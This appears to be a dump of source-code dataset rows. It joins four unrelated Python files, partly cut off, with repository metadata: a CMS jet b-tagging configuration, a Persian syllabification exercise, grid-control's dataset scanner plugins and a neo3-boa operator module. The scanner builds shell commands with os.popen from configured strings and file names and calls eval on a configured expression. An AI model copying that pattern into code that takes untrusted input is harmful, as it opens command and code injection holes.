akPuFilter1PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter1HiGenJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
akPuFilter1PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPuFilter1PFJets")
)
akPuFilter1PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPuFilter1PFJets"),
payload = "AKPu1PF_offline"
)
akPuFilter1PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPuFilter1CaloJets'))
#akPuFilter1PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak1HiSignalGenJets'))
akPuFilter1PFbTagger = bTaggers("akPuFilter1PF",0.1)
#create objects locally since they dont load properly otherwise
#akPuFilter1PFmatch = akPuFilter1PFbTagger.match
akPuFilter1PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPuFilter1PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akPuFilter1PFPatJetFlavourAssociationLegacy = akPuFilter1PFbTagger.PatJetFlavourAssociationLegacy
akPuFilter1PFPatJetPartons = akPuFilter1PFbTagger.PatJetPartons
akPuFilter1PFJetTracksAssociatorAtVertex = akPuFilter1PFbTagger.JetTracksAssociatorAtVertex
akPuFilter1PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexBJetTags
akPuFilter1PFCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexV2BJetTags
akPuFilter1PFJetBProbabilityBJetTags = akPuFilter1PFbTagger.JetBProbabilityBJetTags
akPuFilter1PFSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.SoftPFMuonByPtBJetTags
akPuFilter1PFSoftPFMuonByIP3dBJetTags = akPuFilter1PFbTagger.SoftPFMuonByIP3dBJetTags
akPuFilter1PFTrackCountingHighEffBJetTags = akPuFilter1PFbTagger.TrackCountingHighEffBJetTags
akPuFilter1PFTrackCountingHighPurBJetTags = akPuFilter1PFbTagger.TrackCountingHighPurBJetTags
akPuFilter1PFPatJetPartonAssociationLegacy = akPuFilter1PFbTagger.PatJetPartonAssociationLegacy
akPuFilter1PFImpactParameterTagInfos = akPuFilter1PFbTagger.ImpactParameterTagInfos
akPuFilter1PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuFilter1PFJetProbabilityBJetTags = akPuFilter1PFbTagger.JetProbabilityBJetTags
akPuFilter1PFSecondaryVertexTagInfos = akPuFilter1PFbTagger.SecondaryVertexTagInfos
akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexBJetTags
akPuFilter1PFCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.CombinedSecondaryVertexV2BJetTags
akPuFilter1PFSecondaryVertexNegativeTagInfos = akPuFilter1PFbTagger.SecondaryVertexNegativeTagInfos
akPuFilter1PFNegativeSimpleSecondaryVertexHighEffBJetTags = akPuFilter1PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPuFilter1PFNegativeSimpleSecondaryVertexHighPurBJetTags = akPuFilter1PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPuFilter1PFNegativeCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akPuFilter1PFPositiveCombinedSecondaryVertexBJetTags = akPuFilter1PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akPuFilter1PFNegativeCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPuFilter1PFPositiveCombinedSecondaryVertexV2BJetTags = akPuFilter1PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPuFilter1PFSoftPFMuonsTagInfos = akPuFilter1PFbTagger.SoftPFMuonsTagInfos
akPuFilter1PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPuFilter1PFSoftPFMuonBJetTags = akPuFilter1PFbTagger.SoftPFMuonBJetTags
akPuFilter1PFSoftPFMuonByIP3dBJetTags = akPuFilter1PFbTagger.SoftPFMuonByIP3dBJetTags
akPuFilter1PFSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.SoftPFMuonByPtBJetTags
akPuFilter1PFNegativeSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.NegativeSoftPFMuonByPtBJetTags
akPuFilter1PFPositiveSoftPFMuonByPtBJetTags = akPuFilter1PFbTagger.PositiveSoftPFMuonByPtBJetTags
akPuFilter1PFPatJetFlavourIdLegacy = cms.Sequence(akPuFilter1PFPatJetPartonAssociationLegacy*akPuFilter1PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPuFilter1PFPatJetFlavourAssociation = akPuFilter1PFbTagger.PatJetFlavourAssociation
#akPuFilter1PFPatJetFlavourId = cms.Sequence(akPuFilter1PFPatJetPartons*akPuFilter1PFPatJetFlavourAssociation)
akPuFilter1PFJetBtaggingIP = cms.Sequence(akPuFilter1PFImpactParameterTagInfos *
(akPuFilter1PFTrackCountingHighEffBJetTags +
akPuFilter1PFTrackCountingHighPurBJetTags +
akPuFilter1PFJetProbabilityBJetTags +
akPuFilter1PFJetBProbabilityBJetTags
)
)
akPuFilter1PFJetBtaggingSV = cms.Sequence(akPuFilter1PFImpactParameterTagInfos
*
akPuFilter1PFSecondaryVertexTagInfos
* (akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags+
akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags+
akPuFilter1PFCombinedSecondaryVertexBJetTags+
akPuFilter1PFCombinedSecondaryVertexV2BJetTags
)
)
akPuFilter1PFJetBtaggingNegSV = cms.Sequence(akPuFilter1PFImpactParameterTagInfos
*
akPuFilter1PFSecondaryVertexNegativeTagInfos
* (akPuFilter1PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akPuFilter1PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akPuFilter1PFNegativeCombinedSecondaryVertexBJetTags+
akPuFilter1PFPositiveCombinedSecondaryVertexBJetTags+
akPuFilter1PFNegativeCombinedSecondaryVertexV2BJetTags+
akPuFilter1PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPuFilter1PFJetBtaggingMu = cms.Sequence(akPuFilter1PFSoftPFMuonsTagInfos * (akPuFilter1PFSoftPFMuonBJetTags
+
akPuFilter1PFSoftPFMuonByIP3dBJetTags
+
akPuFilter1PFSoftPFMuonByPtBJetTags
+
akPuFilter1PFNegativeSoftPFMuonByPtBJetTags
+
akPuFilter1PFPositiveSoftPFMuonByPtBJetTags
)
)
akPuFilter1PFJetBtagging = cms.Sequence(akPuFilter1PFJetBtaggingIP
*akPuFilter1PFJetBtaggingSV
*akPuFilter1PFJetBtaggingNegSV
# *akPuFilter1PFJetBtaggingMu
)
akPuFilter1PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPuFilter1PFJets"),
genJetMatch = cms.InputTag("akPuFilter1PFmatch"),
genPartonMatch = cms.InputTag("akPuFilter1PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPuFilter1PFcorr")),
JetPartonMapSource = cms.InputTag("akPuFilter1PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPuFilter1PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPuFilter1PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPuFilter1PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPuFilter1PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPuFilter1PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPuFilter1PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPuFilter1PFJetBProbabilityBJetTags"),
cms.InputTag("akPuFilter1PFJetProbabilityBJetTags"),
#cms.InputTag("akPuFilter1PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPuFilter1PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPuFilter1PFTrackCountingHighEffBJetTags"),
cms.InputTag("akPuFilter1PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPuFilter1PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPuFilter1PFNjettiness = Njettiness.clone(
src = cms.InputTag("akPuFilter1PFJets"),
R0 = cms.double( 0.1)
)
akPuFilter1PFpatJetsWithBtagging.userData.userFloats.src += ['akPuFilter1PFNjettiness:tau1','akPuFilter1PFNjettiness:tau2','akPuFilter1PFNjettiness:tau3']
akPuFilter1PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPuFilter1PFpatJetsWithBtagging"),
genjetTag = 'ak1HiGenJets',
rParam = 0.1,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPuFilter1PF"),
jetName = cms.untracked.string("akPuFilter1PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akFilter1GenJets"),
doGenTaus = True
)
akPuFilter1PFJetSequence_mc = cms.Sequence(
#akPuFilter1PFclean
#*
akPuFilter1PFmatch
#*
#akPuFilter1PFmatchGroomed
*
akPuFilter1PFparton
*
akPuFilter1PFcorr
*
#akPuFilter1PFJetID
#*
akPuFilter1PFPatJetFlavourIdLegacy
#*
#akPuFilter1PFPatJetFlavourId # Use legacy algo till PU implemented
*
akPuFilter1PFJetTracksAssociatorAtVertex
*
akPuFilter1PFJetBtagging
*
akPuFilter1PFNjettiness
*
akPuFilter1PFpatJetsWithBtagging
*
akPuFilter1PFJetAnalyzer
)
akPuFilter1PFJetSequence_data = cms.Sequence(akPuFilter1PFcorr
*
#akPuFilter1PFJetID
#*
akPuFilter1PFJetTracksAssociatorAtVertex
*
akPuFilter1PFJetBtagging
*
akPuFilter1PFNjettiness
*
akPuFilter1PFpatJetsWithBtagging
*
akPuFilter1PFJetAnalyzer
)
akPuFilter1PFJetSequence_jec = cms.Sequence(akPuFilter1PFJetSequence_mc)
akPuFilter1PFJetSequence_mb = cms.Sequence(akPuFilter1PFJetSequence_mc)
akPuFilter1PFJetSequence = cms.Sequence(akPuFilter1PFJetSequence_jec)
akPuFilter1PFJetAnalyzer.genPtMin = cms.untracked.double(1)
akPuFilter1PFJetAnalyzer.jetPtMin = cms.double(1)
| [
"[email protected]"
]
| |
5aec16750f6f86a0cdcfca7f3b20d9375929d277 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /TsRjbMRoNCM3GHuDk_9.py | 7ca02c3b7d778338936732065ba5053888817fc2 | []
| no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,568 | py | """
The syllabic structure of Persian language is CV(C)(C). C stands for
consonants and V stands for Vowels. The CV(C)(C) means that there are three
types of syllables in Persian:
* CV
* CVC
* CVCC
Write a function that takes the phonetic transcription of a Persian word as an
argument and returns the syllabified word based on the syllabic structure. In
other word, put a period between syllables.
### Examples
syllabification("kAr") ➞ "kAr"
syllabification("bArAn") ➞ "bA.rAn"
syllabification("tA") ➞ "tA"
syllabification("deraxt") ➞ "de.raxt"
syllabification("pust") ➞ "pust"
syllabification("lAjevard") ➞ "lA.je.vard"
### Notes
* Mono-syllabic words don't need syllabification.
* Persian has six vowels: `a, A, e, i, o, u`
* Persian has 23 consonants: `p, b, t, d, k, g, G, ?, f, v, s, z, S, Z, x, h, c, j, m, n, r, l, y`
* Try to solve the problem by using RegEx.
### Hint
Since each syllable has only one vowel, it's not necessary to know the
consonants. Just knowing that there are only one consonant before the vowel
and 0 to 2 consonants after the vowel is enough to solve the challenge.
"""
def syllabification(word):
v = 'aAeiou'
lst_idx_v = [i for i, l in enumerate(word) if l in v]
if len(lst_idx_v) == 1:
return word
begin = 0
syllables = []
for i in range(1, len(lst_idx_v)):
syllables.append(word[begin: lst_idx_v[i] - 1])
begin = lst_idx_v[i] - 1
syllables.append(word[begin:])
return '.'.join(syllables)
| [
"[email protected]"
]
| |
611a0c5777f47f7658d656110a34f4b258b8ccf4 | 8fcdcec1bf0f194d23bba4acd664166a04dc128f | /packages/grid_control/datasets/scanner_basic.py | db6e80561435f992b58c20ba4e1205c5861bfe7a | []
| no_license | grid-control/grid-control | e51337dd7e5d158644a8da35923443fb0d232bfb | 1f5295cd6114f3f18958be0e0618ff6b35aa16d7 | refs/heads/master | 2022-11-13T13:29:13.226512 | 2021-10-01T14:37:59 | 2021-10-01T14:37:59 | 13,805,261 | 32 | 30 | null | 2023-02-19T16:22:47 | 2013-10-23T14:39:28 | Python | UTF-8 | Python | false | false | 16,454 | py | # | Copyright 2010-2017 Karlsruhe Institute of Technology
# |
# | Licensed under the Apache License, Version 2.0 (the "License");
# | you may not use this file except in compliance with the License.
# | You may obtain a copy of the License at
# |
# | http://www.apache.org/licenses/LICENSE-2.0
# |
# | Unless required by applicable law or agreed to in writing, software
# | distributed under the License is distributed on an "AS IS" BASIS,
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# | See the License for the specific language governing permissions and
# | limitations under the License.
import os, logging
from grid_control.backends.storage import se_ls
from grid_control.config import ConfigError, create_config
from grid_control.datasets import DataProvider, DatasetError
from grid_control.datasets.scanner_base import InfoScanner
from grid_control.job_db import JobClass
from grid_control.job_selector import AndJobSelector, ClassSelector, JobSelector
from grid_control.utils import DictFormat, clean_path, split_opt
from grid_control.utils.activity import ProgressActivity
from grid_control.utils.algos import filter_dict
from grid_control.utils.parsing import parse_str
from hpfwk import clear_current_exception
from python_compat import identity, ifilter, imap, irange, izip, lfilter, lidfilter, lmap, set, sorted # pylint:disable=line-too-long
class AddFilePrefix(InfoScanner):
alias_list = ['prefix']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._prefix = config.get('filename prefix', '')
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
yield (self._prefix + item, metadata_dict, entries, location_list, obj_dict)
class DetermineEntries(InfoScanner):
alias_list = ['DetermineEvents', 'events']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._entries_cmd = config.get(['events command', 'entries command'], '')
self._entries_key = config.get(['events key', 'entries key'], '')
self._entries_key_scale = config.get_float(['events per key value', 'entries per key value'], 1.)
self._entries_default = config.get_int(['events default', 'entries default'], -1)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if (entries is None) or (entries < 0):
entries = self._entries_default
if self._entries_key:
entries_meta = int(metadata_dict.get(self._entries_key, entries))
entries = max(1, int(entries_meta * self._entries_key_scale))
if self._entries_cmd:
try:
entries = int(os.popen('%s %s' % (self._entries_cmd, item)).readlines()[-1])
except Exception:
self._log.log(logging.INFO2, 'Unable to determine entries with %r %r', self._entries_cmd, item)
clear_current_exception()
yield (item, metadata_dict, entries, location_list, obj_dict)
class FilesFromDataProvider(InfoScanner):
alias_list = ['provider_files']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
source_dataset_path = config.get('source dataset path')
self._source = DataProvider.create_instance('ListProvider', config,
'source dataset', source_dataset_path)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
for block in self._source.get_block_list_cached(show_stats=False):
metadata_keys = block.get(DataProvider.Metadata, [])
for fi in block[DataProvider.FileList]:
metadata_dict['SRC_DATASET'] = block[DataProvider.Dataset]
metadata_dict['SRC_BLOCK'] = block[DataProvider.BlockName]
metadata_dict.update(dict(izip(metadata_keys, fi.get(DataProvider.Metadata, []))))
yield (fi[DataProvider.URL], metadata_dict, fi[DataProvider.NEntries],
block[DataProvider.Locations], obj_dict)
class FilesFromJobInfo(InfoScanner):
alias_list = ['jobinfo_files']
def get_guard_keysets(self):
return (['SE_OUTPUT_FILE'], ['SE_OUTPUT_PATH'])
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if 'JOBINFO' not in obj_dict:
raise DatasetError('Job infos not available! Ensure that "JobInfoFromOutputDir" is selected!')
try:
job_info_dict = obj_dict['JOBINFO']
file_info_str_iter = ifilter(lambda x: x[0].startswith('file'), job_info_dict.items())
file_info_tuple_list = imap(lambda x_y: tuple(x_y[1].strip('"').split(' ')), file_info_str_iter)
for (file_hash, fn_local, fn_dest, se_path) in file_info_tuple_list:
metadata_dict.update({'SE_OUTPUT_HASH_MD5': file_hash, 'SE_OUTPUT_FILE': fn_local,
'SE_OUTPUT_BASE': os.path.splitext(fn_local)[0], 'SE_OUTPUT_PATH': se_path})
yield (os.path.join(se_path, fn_dest), metadata_dict, entries, location_list, obj_dict)
except Exception:
raise DatasetError('Unable to read file stageout information!')
class FilesFromLS(InfoScanner):
alias_list = ['ls']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._path = config.get('source directory', '.')
self._timeout = config.get_int('source timeout', 120)
self._trim = config.get_bool('source trim local', True)
self._recurse = config.get_bool('source recurse', False)
if '://' not in self._path:
self._path = 'file://' + self._path
(prot, path) = self._path.split('://')
self._path = prot + '://' + clean_path(path)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
metadata_dict['GC_SOURCE_DIR'] = self._path
progress = ProgressActivity('Reading source directory')
for counter, size_url in enumerate(self._iter_path(self._path)):
progress.update_progress(counter)
metadata_dict['FILE_SIZE'] = size_url[0]
url = size_url[1]
if self._trim:
url = url.replace('file://', '')
yield (url, metadata_dict, entries, location_list, obj_dict)
progress.finish()
def _iter_path(self, path):
proc = se_ls(path)
for size_basename in proc.stdout.iter(timeout=self._timeout):
(size, basename) = size_basename.strip().split(' ', 1)
size = int(size)
if size >= 0:
yield (size, os.path.join(path, basename))
elif self._recurse:
for result in self._iter_path(os.path.join(path, basename)):
yield result
if proc.status(timeout=0) != 0:
self._log.log_process(proc)
class JobInfoFromOutputDir(InfoScanner):
alias_list = ['dn_jobinfo']
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
job_info_path = os.path.join(item, 'job.info')
try:
job_info_dict = DictFormat('=').parse(open(job_info_path))
if job_info_dict.get('exitcode') == 0:
obj_dict['JOBINFO'] = job_info_dict
yield (item, metadata_dict, entries, location_list, obj_dict)
except Exception:
self._log.log(logging.INFO2, 'Unable to parse job info file %r', job_info_path)
clear_current_exception()
class MatchDelimeter(InfoScanner):
alias_list = ['delimeter']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
# delimeter based selection
match_delim_str = config.get('delimeter match', '')
self._match_delim = match_delim_str.split(':')
self._match_inactive = len(self._match_delim) != 2
# delimeter based metadata setup
self._setup_arg_list = []
self._guard_ds = self._setup('DELIMETER_DS',
config.get('delimeter dataset key', ''),
config.get('delimeter dataset modifier', ''))
self._guard_b = self._setup('DELIMETER_B',
config.get('delimeter block key', ''),
config.get('delimeter block modifier', ''))
def get_guard_keysets(self):
return (self._guard_ds, self._guard_b)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
fn_base = os.path.basename(item)
if self._match_inactive or fn_base.count(self._match_delim[0]) == int(self._match_delim[1]):
for setup in self._setup_arg_list:
self._process(item, metadata_dict, *setup)
yield (item, metadata_dict, entries, location_list, obj_dict)
def _process(self, item, metadata_dict, key, delim, delim_start, delim_end, modifier_fun):
value = str.join(delim, os.path.basename(item).split(delim)[delim_start:delim_end])
try:
metadata_dict[key] = str(modifier_fun(value))
except Exception:
raise DatasetError('Unable to modifiy %s: %r' % (key, value))
def _setup(self, setup_vn, setup_key, setup_mod):
if setup_key:
(delim, delim_start_str, delim_end_str) = split_opt(setup_key, '::')
modifier = identity
if setup_mod and (setup_mod.strip() != 'value'):
try:
modifier = eval('lambda value: ' + setup_mod) # pylint:disable=eval-used
except Exception:
raise ConfigError('Unable to parse delimeter modifier %r' % setup_mod)
(delim_start, delim_end) = (parse_str(delim_start_str, int), parse_str(delim_end_str, int))
self._setup_arg_list.append((setup_vn, delim, delim_start, delim_end, modifier))
return [setup_vn]
return []
class MatchOnFilename(InfoScanner):
alias_list = ['match']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._match = config.get_matcher('filename filter', '*.root', default_matcher='ShellStyleMatcher')
self._relative = config.get_bool('filename filter relative', True)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
fn_match = item
if self._relative:
fn_match = os.path.basename(item)
if self._match.match(fn_match) > 0:
yield (item, metadata_dict, entries, location_list, obj_dict)
class MetadataFromTask(InfoScanner):
alias_list = ['task_metadata']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
ignore_list_default = lmap(lambda x: 'SEED_%d' % x, irange(10)) + ['DOBREAK', 'FILE_NAMES',
'GC_DEPFILES', 'GC_JOBID', 'GC_JOBNUM', 'GC_JOB_ID', 'GC_PARAM', 'GC_RUNTIME', 'GC_VERSION',
'JOB_RANDOM', 'JOBID', 'LANDINGZONE_LL', 'LANDINGZONE_UL', 'MY_JOB', 'MY_JOBID', 'MY_RUNTIME',
'SB_INPUT_FILES', 'SB_OUTPUT_FILES', 'SCRATCH_LL', 'SCRATCH_UL', 'SEEDS',
'SE_INPUT_FILES', 'SE_INPUT_PATH', 'SE_INPUT_PATTERN', 'SE_MINFILESIZE',
'SE_OUTPUT_FILES', 'SE_OUTPUT_PATH', 'SE_OUTPUT_PATTERN', 'SUBST_FILES']
self._ignore_vars = config.get_list('ignore task vars', ignore_list_default)
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
if ('GC_TASK' in obj_dict) and ('GC_JOBNUM' in metadata_dict):
job_env_dict = obj_dict['GC_TASK'].get_job_dict(metadata_dict['GC_JOBNUM'])
for (key_new, key_old) in obj_dict['GC_TASK'].get_var_alias_map().items():
job_env_dict[key_new] = job_env_dict.get(key_old)
metadata_dict.update(filter_dict(job_env_dict, key_filter=lambda k: k not in self._ignore_vars))
yield (item, metadata_dict, entries, location_list, obj_dict)
class OutputDirsFromConfig(InfoScanner):
alias_list = ['config_dn']
# Get output directories from external config file
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
ext_config_fn = config.get_fn('source config')
ext_config_raw = create_config(ext_config_fn, load_only_old_config=True)
ext_config = ext_config_raw.change_view(set_sections=['global'])
self._ext_work_dn = ext_config.get_work_path()
logging.getLogger().disabled = True
ext_workflow = ext_config.get_plugin('workflow', 'Workflow:global', cls='Workflow',
pkwargs={'backend': 'NullWMS'})
logging.getLogger().disabled = False
self._ext_task = ext_workflow.task
job_selector = JobSelector.create(config.get('source job selector', ''), task=self._ext_task)
self._selected = sorted(ext_workflow.job_manager.job_db.get_job_list(AndJobSelector(
ClassSelector(JobClass.SUCCESS), job_selector)))
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
progress_max = None
if self._selected:
progress_max = self._selected[-1] + 1
progress = ProgressActivity('Reading job logs', progress_max)
for jobnum in self._selected:
progress.update_progress(jobnum)
metadata_dict['GC_JOBNUM'] = jobnum
obj_dict.update({'GC_TASK': self._ext_task, 'GC_WORKDIR': self._ext_work_dn})
job_output_dn = os.path.join(self._ext_work_dn, 'output', 'job_%d' % jobnum)
yield (job_output_dn, metadata_dict, entries, location_list, obj_dict)
progress.finish()
class OutputDirsFromWork(InfoScanner):
alias_list = ['work_dn']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._ext_work_dn = config.get_dn('source directory')
self._ext_output_dir = os.path.join(self._ext_work_dn, 'output')
if not os.path.isdir(self._ext_output_dir):
raise DatasetError('Unable to find task output directory %s' % repr(self._ext_output_dir))
self._selector = JobSelector.create(config.get('source job selector', ''))
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
dn_list = lfilter(lambda fn: fn.startswith('job_'), os.listdir(self._ext_output_dir))
progress = ProgressActivity('Reading job logs', len(dn_list))
for idx, dn in enumerate(dn_list):
progress.update_progress(idx)
try:
metadata_dict['GC_JOBNUM'] = int(dn.split('_')[1])
except Exception:
clear_current_exception()
continue
obj_dict['GC_WORKDIR'] = self._ext_work_dn
if self._selector and not self._selector(metadata_dict['GC_JOBNUM'], None):
continue
job_output_dn = os.path.join(self._ext_output_dir, dn)
yield (job_output_dn, metadata_dict, entries, location_list, obj_dict)
progress.finish()
class ParentLookup(InfoScanner):
alias_list = ['parent']
def __init__(self, config, datasource_name):
InfoScanner.__init__(self, config, datasource_name)
self._parent_source = config.get('parent source', '')
self._parent_keys = config.get_list('parent keys', [])
self._parent_match_level = config.get_int('parent match level', 1)
self._parent_merge = config.get_bool('merge parents', False)
# cached "parent lfn parts" (plfnp) to "parent dataset name" (pdn) maps
self._plfnp2pdn_cache = {} # the maps are stored for different parent_dataset_expr
self._empty_config = create_config(use_default_files=False, load_old_config=False)
self._read_plfnp_map(config, self._parent_source) # read from configured parent source
def get_guard_keysets(self):
if self._parent_merge:
return ([], [])
return ([], ['PARENT_PATH'])
def _get_lfnp(self, lfn): # get lfn parts (lfnp)
if lfn and self._parent_match_level: # return looseMatch path elements in reverse order
# /store/local/data/file.root -> file.root (~ML1) | file.root/data/local (~ML3)
tmp = lfn.split('/')
tmp.reverse()
return str.join('/', tmp[:self._parent_match_level])
return lfn
def _iter_datasource_items(self, item, metadata_dict, entries, location_list, obj_dict):
# if parent source is not defined, try to get datacache from GC_WORKDIR
map_plfnp2pdn = dict(self._plfnp2pdn_cache.get(self._parent_source, {}))
datacache_fn = os.path.join(obj_dict.get('GC_WORKDIR', ''), 'datacache.dat')
if os.path.exists(datacache_fn): # extend configured parent source with datacache if it exists
map_plfnp2pdn.update(self._read_plfnp_map(self._empty_config, datacache_fn))
pdn_list = [] # list with parent dataset names
for key in ifilter(metadata_dict.__contains__, self._parent_keys):
parent_lfn_list = metadata_dict[key]
if not isinstance(parent_lfn_list, list):
parent_lfn_list = [metadata_dict[key]]
for parent_lfn in parent_lfn_list:
pdn_list.append(map_plfnp2pdn.get(self._get_lfnp(parent_lfn)))
metadata_dict['PARENT_PATH'] = lidfilter(set(pdn_list))
yield (item, metadata_dict, entries, location_list, obj_dict)
def _read_plfnp_map(self, config, parent_dataset_expr):
if parent_dataset_expr and (parent_dataset_expr not in self._plfnp2pdn_cache):
# read parent source and fill lfnMap with parent_lfn_parts -> parent dataset name mapping
map_plfnp2pdn = self._plfnp2pdn_cache.setdefault(parent_dataset_expr, {})
for block in DataProvider.iter_blocks_from_expr(self._empty_config, parent_dataset_expr):
for fi in block[DataProvider.FileList]:
map_plfnp2pdn[self._get_lfnp(fi[DataProvider.URL])] = block[DataProvider.Dataset]
return self._plfnp2pdn_cache.get(parent_dataset_expr, {}) # return cached mapping
| [
"[email protected]"
]
| |
0c1509e1816728cd8c2678be1b3f957b1ad9cc38 | 75e951dcf749f62f2a292774968fe95fc4a353c8 | /boa3/model/operation/unaryop.py | 8d001b89427dfa1ef705bb7c35ec6be1e5ab8fb7 | [
"Apache-2.0"
]
| permissive | jplippi/neo3-boa | e0a199d1ed2fa39abe09ebd3c013c360ca87f544 | 052be4adebb665113715bb80067d954f7ad85ad5 | refs/heads/development | 2022-08-19T10:17:43.610854 | 2020-05-25T20:30:42 | 2020-05-25T20:30:42 | 265,959,419 | 0 | 0 | Apache-2.0 | 2020-05-25T20:39:59 | 2020-05-21T21:54:24 | Python | UTF-8 | Python | false | false | 2,046 | py | from typing import Optional
from boa3.model.operation.operator import Operator
from boa3.model.operation.unary.booleannot import BooleanNot
from boa3.model.operation.unary.negative import Negative
from boa3.model.operation.unary.positive import Positive
from boa3.model.operation.unary.unaryoperation import UnaryOperation
from boa3.model.type.type import IType
class UnaryOp:
# Arithmetic operations
Positive = Positive()
Negative = Negative()
# Logical operations
Not = BooleanNot()
